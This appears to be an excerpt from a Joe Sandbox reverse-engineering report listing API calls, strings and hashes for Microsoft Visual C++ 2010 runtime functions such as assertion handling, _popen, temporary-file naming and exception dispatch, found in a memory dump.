                                                                                                          • <program name unknown>, xrefs: 6FDFC513
                                                                                                          • Expression: , xrefs: 6FDFC750
                                                                                                          • For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts, xrefs: 6FDFC805
                                                                                                          • Microsoft Visual C++ Runtime Library, xrefs: 6FDFC868
                                                                                                          • Assertion failed: %s, file %s, line %d, xrefs: 6FDFC9C0
                                                                                                          • Assertion failed!, xrefs: 6FDFC49B
                                                                                                          • Line: , xrefs: 6FDFC6D9
                                                                                                          • File: , xrefs: 6FDFC5C8
                                                                                                          • (Press Retry to debug the application - JIT must be enabled), xrefs: 6FDFC840
                                                                                                          • Program: , xrefs: 6FDFC4DB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: strcat_s$strlen$_mbsnbcat_s$__p__iob$_set_error_modestrcpy_s$FileModuleName_exit_invoke_watson_itoa_s_mbsnbcpy_sabortfflushfprintfraisesetvbuf
                                                                                                          • String ID: (Press Retry to debug the application - JIT must be enabled)$<program name unknown>$Assertion failed!$Assertion failed: %s, file %s, line %d$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Microsoft Visual C++ Runtime Library$Program:
                                                                                                          • API String ID: 2590874204-2333777566
                                                                                                          • Opcode ID: 04fab976af660f3103ce9a07f47cded5a27cd52955b766e0187d95125c4c8b78
                                                                                                          • Instruction ID: 94711e067bba1b5e3467d7e3ec05043745ec30187fe56febd5f35042395cb442
                                                                                                          • Opcode Fuzzy Hash: 04fab976af660f3103ce9a07f47cded5a27cd52955b766e0187d95125c4c8b78
                                                                                                          • Instruction Fuzzy Hash: E7D1C671D11319BADBA187B1DC88FDA77BCAF19358F4504A5E808E6141F730FBA58E60
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD5480,000000A4), ref: 6FDD4FDE
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD5480,000000A4), ref: 6FDD4FE9
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _pipe.MSVCR100(?,00000400,00000000,6FDD5480,000000A4), ref: 6FDD5055
                                                                                                          • _close.MSVCR100(?,?,?,?,?,?,?,?,6FDD5480,000000A4), ref: 6FDD5092
                                                                                                          • _close.MSVCR100(?,?,?,?,?,?,?,?,?,6FDD5480,000000A4), ref: 6FDD509A
                                                                                                          • _lock.MSVCR100(00000009,?,?,?,?,?,?,?,6FDD5480,000000A4), ref: 6FDD50A8
                                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6FDD5480,000000A4), ref: 6FDD50B7
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000002,?,?,?,?,?,?,?,6FDD5480,000000A4), ref: 6FDD50E5
                                                                                                          • _close.MSVCR100(?,?,00000000,?,00000000,00000001,00000002,?,?,?,?,?,?,?,6FDD5480,000000A4), ref: 6FDD50F5
                                                                                                          • _fdopen.MSVCR100(?,00000077,?,?,00000000,?,00000000,00000001,00000002), ref: 6FDD510C
                                                                                                          • _dupenv_s.MSVCR100(?,00000000,COMSPEC), ref: 6FDD513B
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDD5151
                                                                                                          • memset.MSVCR100(?,00000000,00000044), ref: 6FDD5177
                                                                                                          • strlen.MSVCR100(?), ref: 6FDD51BC
                                                                                                          • strlen.MSVCR100(?,?), ref: 6FDD51C6
                                                                                                          • strlen.MSVCR100( /c ,?,?), ref: 6FDD51D3
                                                                                                          • _calloc_crt.MSVCR100(?,00000001, /c ,?,?), ref: 6FDD51DF
                                                                                                          • strcpy_s.MSVCR100(00000000,?,?), ref: 6FDD51F7
                                                                                                          • strcat_s.MSVCR100(00000001,?, /c ,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6FDD520C
                                                                                                          • strcat_s.MSVCR100(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6FDD5223
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6FDD5233
                                                                                                          • _access_s.MSVCR100(6FDB3030,00000000), ref: 6FDD5241
                                                                                                          • CreateProcessA.KERNEL32(6FDB3030,00000001,00000000,00000000,00000001,00000000,00000000,00000000,?,?), ref: 6FDD5264
                                                                                                          • _calloc_crt.MSVCR100(00000104,00000001), ref: 6FDD527D
                                                                                                          • free.MSVCR100(00000001,00000000), ref: 6FDD5296
                                                                                                          • free.MSVCR100(?,00000001,00000000), ref: 6FDD529E
                                                                                                            • Part of subcall function 6FDFBBEC: _errno.MSVCR100(00000000,00000000), ref: 6FDFBC07
                                                                                                          • strlen.MSVCR100(00000000), ref: 6FDD5321
                                                                                                          • _mbsrchr.MSVCR100(00000000,0000005C), ref: 6FDD533B
                                                                                                          • strcat_s.MSVCR100(00000000,00000104,6FDB3024), ref: 6FDD534E
                                                                                                          • strlen.MSVCR100(6FDB3030), ref: 6FDD5361
                                                                                                          • strlen.MSVCR100(00000000,6FDB3030), ref: 6FDD536A
                                                                                                          • strcat_s.MSVCR100(00000000,00000104,6FDB3030), ref: 6FDD5382
                                                                                                          • _access_s.MSVCR100(00000000,00000000), ref: 6FDD5394
                                                                                                          • CreateProcessA.KERNEL32(00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000000,?,?), ref: 6FDD53B5
                                                                                                          • free.MSVCR100(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6FDD528E
                                                                                                            • Part of subcall function 6FD8014E: HeapFree.KERNEL32(00000000,00000000,?,6FDA7602,00000000), ref: 6FD80164
                                                                                                          • _errno.MSVCR100 ref: 6FDD52A6
                                                                                                          • _dupenv_s.MSVCR100(?,00000000,PATH), ref: 6FDD52BF
                                                                                                          • free.MSVCR100(?), ref: 6FDD52DB
                                                                                                          • free.MSVCR100(00000000,?), ref: 6FDD52E1
                                                                                                          • free.MSVCR100(00000001,00000000,?), ref: 6FDD52E9
                                                                                                          • free.MSVCR100(?,00000001,00000000,?), ref: 6FDD52F1
                                                                                                          • free.MSVCR100(?), ref: 6FDD53C1
                                                                                                          • free.MSVCR100(00000000,?), ref: 6FDD53C7
                                                                                                          • free.MSVCR100(00000001), ref: 6FDD53D1
                                                                                                          • free.MSVCR100(?,00000001), ref: 6FDD53D9
                                                                                                          • CloseHandle.KERNEL32(?), ref: 6FDD53E9
                                                                                                          • CloseHandle.KERNEL32(?), ref: 6FDD53EE
                                                                                                          • _errno.MSVCR100 ref: 6FDD53F0
                                                                                                          • fclose.MSVCR100(?), ref: 6FDD5423
                                                                                                          • _close.MSVCR100(?,?,00000000,?,00000000,00000001,00000002,?,?,?,?,?,?,?,6FDD5480,000000A4), ref: 6FDD5440
                                                                                                          • _close.MSVCR100(?,?,00000000,?,00000000,00000001,00000002,?,?,?,?,?,?,?,6FDD5480,000000A4), ref: 6FDD5453
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$strlen$_close_errno$strcat_s$HandleProcess$CloseCreate_access_s_calloc_crt_dupenv_s$CurrentDuplicateFreeHeap_fdopen_invalid_parameter_invalid_parameter_noinfo_invoke_watson_lock_mbsrchr_pipefclosememsetstrcpy_s
                                                                                                          • String ID: /c $COMSPEC$PATH$cmd.exe$w
                                                                                                          • API String ID: 4026113611-3679458415
                                                                                                          • Opcode ID: 782a2d6b5f46cbf052d2054fb8c36016e28bb1251125b3a615497a11a94e9a35
                                                                                                          • Instruction ID: f62fb0b6540bb6db178759ab63009222dfc03473be5983049280dc9d7c27c3f0
                                                                                                          • Opcode Fuzzy Hash: 782a2d6b5f46cbf052d2054fb8c36016e28bb1251125b3a615497a11a94e9a35
                                                                                                          • Instruction Fuzzy Hash: 91E1B072C05319EFDF909FA8DC80ADD7BB9EF09354F20402AF525AB290DB3179958B61
                                                                                                          APIs
                                                                                                          • _dupenv_s.MSVCR100(?,00000000,TMP,6FDD6878,00000020), ref: 6FDD6636
                                                                                                            • Part of subcall function 6FDFBAF4: _lock.MSVCR100(00000007,6FDFBBD0,0000000C,6FDD1451,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDFBB02
                                                                                                            • Part of subcall function 6FDFBAF4: _errno.MSVCR100(6FDFBBD0,0000000C,6FDD1451,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDFBB1B
                                                                                                            • Part of subcall function 6FDFBAF4: _invalid_parameter_noinfo.MSVCR100(6FDFBBD0,0000000C,6FDD1451,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDFBB25
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDD664C
                                                                                                          • _access_s.MSVCR100(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDD6666
                                                                                                          • strlen.MSVCR100(?,00000000,00000000,00000000,00000000,00000000), ref: 6FDD6685
                                                                                                          • strlen.MSVCR100(6FD86E28), ref: 6FDD668F
                                                                                                          • calloc.MSVCR100(?,00000001,6FD86E28), ref: 6FDD66A1
                                                                                                          • strcat_s.MSVCR100(00000000,6FD86E28,6FD86E28), ref: 6FDD66BE
                                                                                                          • strlen.MSVCR100(6FD86E28), ref: 6FDD66D1
                                                                                                          • _mbsrchr.MSVCR100(?,0000005C,?,?,?,00000000,00000000,00000000), ref: 6FDD66E7
                                                                                                          • strcat_s.MSVCR100(00000000,?,6FDB3024,?,?,?,00000000,00000000,00000000), ref: 6FDD66F8
                                                                                                          • _access_s.MSVCR100(?,00000000), ref: 6FDD6719
                                                                                                          • _access_s.MSVCR100(6FDB3024,00000000), ref: 6FDD672F
                                                                                                          • strcat_s.MSVCR100(00000000,?,6FDB3024), ref: 6FDD6754
                                                                                                          • strcat_s.MSVCR100(00000000,?,?), ref: 6FDD677A
                                                                                                          • strlen.MSVCR100(00000000), ref: 6FDD6787
                                                                                                          • _lock.MSVCR100(00000002,00000000), ref: 6FDD6791
                                                                                                          • _errno.MSVCR100 ref: 6FDD67BD
                                                                                                          • _errno.MSVCR100 ref: 6FDD67D9
                                                                                                          • free.MSVCR100(00000000), ref: 6FDD67E1
                                                                                                          • _ultoa_s.MSVCR100(6FD86E28,?,0000000A), ref: 6FDD67FF
                                                                                                          • _errno.MSVCR100 ref: 6FDD680D
                                                                                                          • _access_s.MSVCR100(00000000,00000000), ref: 6FDD6818
                                                                                                            • Part of subcall function 6FDCE8AF: __doserrno.MSVCR100(?,?,00000000,00000000), ref: 6FDCE8BC
                                                                                                            • Part of subcall function 6FDCE8AF: _errno.MSVCR100(?,?,00000000,00000000), ref: 6FDCE8C3
                                                                                                            • Part of subcall function 6FDCE8AF: _invalid_parameter_noinfo.MSVCR100(?,?,00000000,00000000), ref: 6FDCE8CD
                                                                                                          • _errno.MSVCR100 ref: 6FDD6823
                                                                                                          • _errno.MSVCR100 ref: 6FDD682D
                                                                                                          • free.MSVCR100(?), ref: 6FDD6843
                                                                                                          • free.MSVCR100(?,?), ref: 6FDD684B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_access_sstrcat_sstrlen$free$_invalid_parameter_noinfo_lock$__doserrno_dupenv_s_invoke_watson_mbsrchr_ultoa_scalloc
                                                                                                          • String ID: TMP
                                                                                                          • API String ID: 982313535-3125297090
                                                                                                          • Opcode ID: 35de89c66a55421952612d675ab8cf43c0de988aae6c8a2bb97a72d8a7b4c042
                                                                                                          • Instruction ID: 401ff8acb4644da6e57f966c57d273e71c1f31db2316ea027f8751cb8e95a939
                                                                                                          • Opcode Fuzzy Hash: 35de89c66a55421952612d675ab8cf43c0de988aae6c8a2bb97a72d8a7b4c042
                                                                                                          • Instruction Fuzzy Hash: 44519372D05319EEDB915FB48C81ADE7BB8AF0B764F10412AF420AA1D0EF35B5418BB5
                                                                                                          APIs
                                                                                                          • _isatty.MSVCR100(?,?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002), ref: 6FD8EBF3
                                                                                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE), ref: 6FD8EC24
                                                                                                          • GetLastError.KERNEL32 ref: 6FD8F105
                                                                                                          • __doserrno.MSVCR100(00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?), ref: 6FDAFD8D
                                                                                                          • _errno.MSVCR100(00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?), ref: 6FDAFD94
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?), ref: 6FDAFD9F
                                                                                                          • __doserrno.MSVCR100(?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0), ref: 6FDAFDBA
                                                                                                          • _errno.MSVCR100(?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0), ref: 6FDAFDC2
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0), ref: 6FDAFDCD
                                                                                                          • _getptd.MSVCR100(?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0), ref: 6FDAFDF8
                                                                                                          • GetConsoleMode.KERNEL32(?,?,?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002), ref: 6FDAFE16
                                                                                                          • GetConsoleCP.KERNEL32(?,6FD8ECE1,?,?,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?), ref: 6FDAFE36
                                                                                                          • isleadbyte.MSVCR100(00000000), ref: 6FDAFEA6
                                                                                                          • mbtowc.MSVCR100(?,?,00000002), ref: 6FDAFED0
                                                                                                          • mbtowc.MSVCR100(?,?,00000001), ref: 6FDAFEF4
                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6FDAFF26
                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6FDAFF4F
                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6FDAFFA8
                                                                                                          • _putwch_nolock.MSVCR100(?), ref: 6FDB000B
                                                                                                          • _putwch_nolock.MSVCR100(0000000D), ref: 6FDB0038
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite$Console__doserrno_errno_invalid_parameter_noinfo_putwch_nolockmbtowc$ByteCharErrorLastModeMultiWide_getptd_isattyisleadbyte
                                                                                                          • String ID:
                                                                                                          • API String ID: 727942522-0
                                                                                                          • Opcode ID: c53ed59c140c00d18d3727a9e46faf847aa83cd5867433e16315bd39ff311010
                                                                                                          • Instruction ID: f74edfcecf7cb0c2facb614aa138c9ac0c2c547a6d731f45df7d78b5e8756fc0
                                                                                                          • Opcode Fuzzy Hash: c53ed59c140c00d18d3727a9e46faf847aa83cd5867433e16315bd39ff311010
                                                                                                          • Instruction Fuzzy Hash: 5A127C75A06268DFDBA18F68CD84BD977B4FF06354F0402DAE41AD7985D730AA80CF92
                                                                                                          APIs
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100(E06D7363,1FFFFFFF,19930522,?,6FDF3973,?,?,?,?,?,00000000,00000000,00000000), ref: 6FDF466D
                                                                                                          • _getptd.MSVCR100(E06D7363,1FFFFFFF,19930522,?,6FDF3973,?,?,?,?,?,00000000), ref: 6FDF46B4
                                                                                                          • _getptd.MSVCR100 ref: 6FDF46C6
                                                                                                          • _getptd.MSVCR100 ref: 6FDF46D4
                                                                                                          • ?_ValidateWrite@@YAHPAXI@Z.MSVCR100(?,00000001), ref: 6FDF46E5
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100 ref: 6FDF46F0
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100 ref: 6FDF471A
                                                                                                          • _getptd.MSVCR100 ref: 6FDF471F
                                                                                                          • _getptd.MSVCR100 ref: 6FDF4731
                                                                                                          • _getptd.MSVCR100 ref: 6FDF473C
                                                                                                          • ??8type_info@@QBE_NABV0@@Z.MSVCR100(6FE25EB8), ref: 6FDF4768
                                                                                                          • ?terminate@@YAXXZ.MSVCR100(E06D7363,1FFFFFFF,19930522,?,6FDF3973,?,?,?,?), ref: 6FDF4779
                                                                                                          • __DestructExceptionObject.MSVCR100(?,00000001,E06D7363,1FFFFFFF,19930522,?,6FDF3973,?,?,?,?), ref: 6FDF4783
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,E06D7363,1FFFFFFF,19930522,?,6FDF3973,?,?,?,?), ref: 6FDF4798
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20A10,?,E06D7363,1FFFFFFF,19930522), ref: 6FDF47AD
                                                                                                          • __TypeMatch.MSVCR100(00000010,?,00200065,6FE20A10,?,E06D7363,1FFFFFFF,19930522), ref: 6FDF4862
                                                                                                          • __DestructExceptionObject.MSVCR100(6FDB2708,00000001,?,6FE20A10,?,E06D7363,1FFFFFFF,19930522), ref: 6FDF48D7
                                                                                                          • _getptd.MSVCR100(?,6FE20A10,?,E06D7363,1FFFFFFF,19930522), ref: 6FDF4914
                                                                                                          • _getptd.MSVCR100(?,6FE20A10,?,E06D7363,1FFFFFFF,19930522), ref: 6FDF4919
                                                                                                          • _getptd.MSVCR100(?,6FE20A10,?,E06D7363,1FFFFFFF,19930522), ref: 6FDF491E
                                                                                                          • _getptd.MSVCR100(?,6FE20A10,?,E06D7363,1FFFFFFF,19930522), ref: 6FDF4929
                                                                                                          • _getptd.MSVCR100(E06D7363,1FFFFFFF,19930522,?,6FDF3973,?,?,?,?,?,00000000,00000000,00000000), ref: 6FDF4996
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100 ref: 6FDF49A4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _getptd$?_inconsistency@@$Exception$DestructObject$??0exception@std@@??8type_info@@?terminate@@MatchThrowTypeV0@@ValidateWrite@@
                                                                                                          • String ID: csm$csm
                                                                                                          • API String ID: 172940389-3733052814
                                                                                                          • Opcode ID: a4f2093b1f401bd433bf69ecdf9c620c579caf5dab9b11c75570ce3b9a5a47c5
                                                                                                          • Instruction ID: dfbbb8f97472a8397ef4044e825dc8a4216e168147ee914da1ab0672a4187d1e
                                                                                                          • Opcode Fuzzy Hash: a4f2093b1f401bd433bf69ecdf9c620c579caf5dab9b11c75570ce3b9a5a47c5
                                                                                                          • Instruction Fuzzy Hash: 30A1AD31802309DFDF90DFA4CA80E9DB7B5BF06358F16415AE9556B290D730B992CFA2
                                                                                                          APIs
                                                                                                          • _wdupenv_s.MSVCR100(?,00000000,TMP,6FDD8538,00000020), ref: 6FDD833E
                                                                                                            • Part of subcall function 6FD90CD7: _lock.MSVCR100(00000007,6FD90D48,0000000C), ref: 6FD90CE5
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDD8354
                                                                                                            • Part of subcall function 6FDFAF2C: GetCurrentProcess.KERNEL32(C0000417), ref: 6FDFAF42
                                                                                                            • Part of subcall function 6FDFAF2C: TerminateProcess.KERNEL32(00000000), ref: 6FDFAF49
                                                                                                          • _waccess_s.MSVCR100(?,00000000), ref: 6FDD8366
                                                                                                          • _waccess_s.MSVCR100(?,00000000), ref: 6FDD837F
                                                                                                          • _waccess_s.MSVCR100(6FDB3048,00000000), ref: 6FDD8391
                                                                                                          • wcslen.MSVCR100(?), ref: 6FDD83A9
                                                                                                          • wcslen.MSVCR100(6FDB3048), ref: 6FDD83B3
                                                                                                          • calloc.MSVCR100(?,00000002,6FDB3048), ref: 6FDD83C5
                                                                                                          • wcscat_s.MSVCR100(00000000,?,6FDB3048), ref: 6FDD83E4
                                                                                                          • wcslen.MSVCR100(6FDB3048), ref: 6FDD83F5
                                                                                                          • wcscat_s.MSVCR100(00000000,?,6FDB3048), ref: 6FDD8415
                                                                                                          • wcscat_s.MSVCR100(00000000,?,?), ref: 6FDD8431
                                                                                                          • wcslen.MSVCR100(00000000), ref: 6FDD8442
                                                                                                          • _lock.MSVCR100(00000002,00000000), ref: 6FDD844F
                                                                                                          • _errno.MSVCR100 ref: 6FDD847B
                                                                                                          • _errno.MSVCR100 ref: 6FDD8497
                                                                                                          • free.MSVCR100(00000000), ref: 6FDD849F
                                                                                                          • _ultow_s.MSVCR100(0000000A,?,0000000A), ref: 6FDD84C4
                                                                                                          • _errno.MSVCR100 ref: 6FDD84D4
                                                                                                          • _waccess_s.MSVCR100(00000000,00000000), ref: 6FDD84DD
                                                                                                          • _errno.MSVCR100 ref: 6FDD84E8
                                                                                                          • _errno.MSVCR100 ref: 6FDD84F2
                                                                                                          • free.MSVCR100(?), ref: 6FDD8508
                                                                                                          • free.MSVCR100(?,?), ref: 6FDD8510
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_waccess_swcslen$freewcscat_s$Process_lock$CurrentTerminate_invoke_watson_ultow_s_wdupenv_scalloc
                                                                                                          • String ID: TMP
                                                                                                          • API String ID: 372815076-3125297090
                                                                                                          • Opcode ID: 4bf88a71808160faeb156270acd15dfe749fa173c7f710014d5de395abe8dbe5
                                                                                                          • Instruction ID: 986555586a3cff2e54d03714dea1033db1f50e16ebae85127e14e4ae260a6e35
                                                                                                          • Opcode Fuzzy Hash: 4bf88a71808160faeb156270acd15dfe749fa173c7f710014d5de395abe8dbe5
                                                                                                          • Instruction Fuzzy Hash: 9A517572D08309EBDF926FA89C809AD77B9EF05328F14502EF424E7190EB35B9518B75
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FD90ECE
                                                                                                          • _waccess_s.MSVCR100(?,00000000), ref: 6FD90ED8
                                                                                                            • Part of subcall function 6FD823DB: GetFileAttributesW.KERNEL32(?), ref: 6FD823FC
                                                                                                          • _errno.MSVCR100 ref: 6FD90EE5
                                                                                                          • _wdupenv_s.MSVCR100(?,00000000,?), ref: 6FD90F08
                                                                                                            • Part of subcall function 6FD90CD7: _lock.MSVCR100(00000007,6FD90D48,0000000C), ref: 6FD90CE5
                                                                                                          • wcslen.MSVCR100(?), ref: 6FD90F2D
                                                                                                          • _errno.MSVCR100(00000000,00000000,00000000), ref: 6FD90F50
                                                                                                          • wcslen.MSVCR100(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6FD90FAA
                                                                                                          • wcscpy_s.MSVCR100(00000000,00000002,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6FD90FF3
                                                                                                          • _waccess_s.MSVCR100(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6FD9100A
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6FD9102D
                                                                                                          • wcscpy_s.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6FD91047
                                                                                                          • free.MSVCR100(?), ref: 6FD91083
                                                                                                          • _errno.MSVCR100 ref: 6FDB10BC
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDB10C6
                                                                                                          • _wfullpath.MSVCR100(?,?,?), ref: 6FDB10DF
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDB1105
                                                                                                          • wcslen.MSVCR100(?,00000000,00000000,00000000,00000000,00000000), ref: 6FDB1110
                                                                                                          • _calloc_crt.MSVCR100(00000002,00000002,?,00000000,00000000,00000000,00000000,00000000), ref: 6FDB111C
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,00000000,00000000,00000000), ref: 6FDB1137
                                                                                                          • _errno.MSVCR100(?,?,?,00000000,00000000,00000000), ref: 6FDB1152
                                                                                                          • wcslen.MSVCR100(?,?,?,?,00000000,00000000,00000000), ref: 6FDB1162
                                                                                                          • _calloc_crt.MSVCR100(00000002,00000002,?,?,?,?,00000000,00000000,00000000), ref: 6FDB116E
                                                                                                          • _errno.MSVCR100 ref: 6FDB11A7
                                                                                                          • _errno.MSVCR100 ref: 6FDB11B2
                                                                                                          • free.MSVCR100(?), ref: 6FDB11C4
                                                                                                          • free.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6FDB11E8
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6FDB11EE
                                                                                                          • free.MSVCR100(?), ref: 6FDB1201
                                                                                                          Memory Dump Source
